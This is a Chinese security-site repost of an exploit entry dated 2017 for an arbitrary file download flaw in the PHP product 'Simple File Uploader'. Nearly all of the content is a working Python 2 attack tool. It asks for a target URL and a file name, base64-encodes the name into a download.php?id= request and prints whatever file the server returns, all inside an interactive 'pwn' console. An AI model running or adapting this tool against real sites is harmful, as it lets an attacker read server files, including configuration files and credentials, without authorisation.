首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Simple File Uploader - Arbitrary File Download
来源:https://pastebin.com/HeT7RuRU 作者:Godoy 发布时间:2017-04-28  
# Exploit Title: Simple File Uploader - Arbitrary File Download
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
 
 
 
 
POC
 
#!/usr/bin/env python
#https://pastebin.com/HeT7RuRU
import os,re,requests,time,base64
os.system('clear')
 
BLUE = '\033[94m'
RED = '\033[91m'
GREEN = '\033[32m'
CYAN = "\033[96m"
WHITE = "\033[97m"
YELLOW = "\033[93m"
MAGENTA = "\033[95m"
GREY = "\033[90m"
DEFAULT = "\033[0m"
 
def banner():
    print WHITE+""
    print "                                              ##          ## "
    print "                                                ##      ##    "   
    print "                                              ############## "
    print "                                            ####  ######  #### "
    print "                                          ###################### "
    print "                                          ##  ##############  ##     "
    print "                                          ##  ##          ##  ## "
    print "                                                ####  ####"
    print ""
 
def details():
    print WHITE+"                              =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 "
    print ""
 
def core_commands():
    os.system('clear')
    print WHITE+'''Core Commands\n===============\n
Command\t\t\tDescription\n-------\t\t\t-----------\n
?\t\t\tHelp menu
quit\t\t\tExit the console
info\t\t\tDisplay information
download\t\t\tExploit Vulnerability
 
    '''
 
def about():
    os.system('clear')
    print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n
Author\t\t\tDescription\n-------\t\t\t-----------\n
Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146
    '''
 
def download():
    other = 'a'
    while other != 'n':
            urltarget = str(raw_input(WHITE+'Target: '))
            filename =  str(raw_input(WHITE+'FileName: '))
            filename =  base64.b64encode(filename)
            print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename
            final = urltarget+'download.php?id='+filename
            r = requests.get(final)
            print r.text
            other = str(raw_input(WHITE+'Test other file? y/n: '))
            if other == "n":
                print "Type quit to exit. Bye!"
 
 
 
banner()
details()
 
option='0'
while option != 0:
    option = (raw_input(RED+"pwn" + WHITE +" > "))
    if option == "quit":
        os.system('clear')
        option = 0
    elif option == "?":
        core_commands()
    elif option == "help":
        core_commands()
    elif option == "about":
        about()
    elif option == "download":
        download()
    elif option == "info":
        about()
    else:
        print "Not a valid option! Need help? Press ? to display core commands " +GREEN
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TYPO3 News Module - SQL Inject
·Microsoft Internet Explorer 11
·Mercurial Custom hg-ssh Wrappe
·Panda Free Antivirus - 'PSKMAD
·Oracle VirtualBox Guest Additi
·IrfanView 4.44 - Denial of Ser
·Apple Safari - Array concat Me
·Alerton Webtalk 2.5 / 3.3 - Mu
·Microsoft Windows 2003 SP2 - '
·MySQL < 5.6.35 / < 5.7.17 - In
·OpenText Documentum Content Se
·Ghostscript 9.21 - Type Confus
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved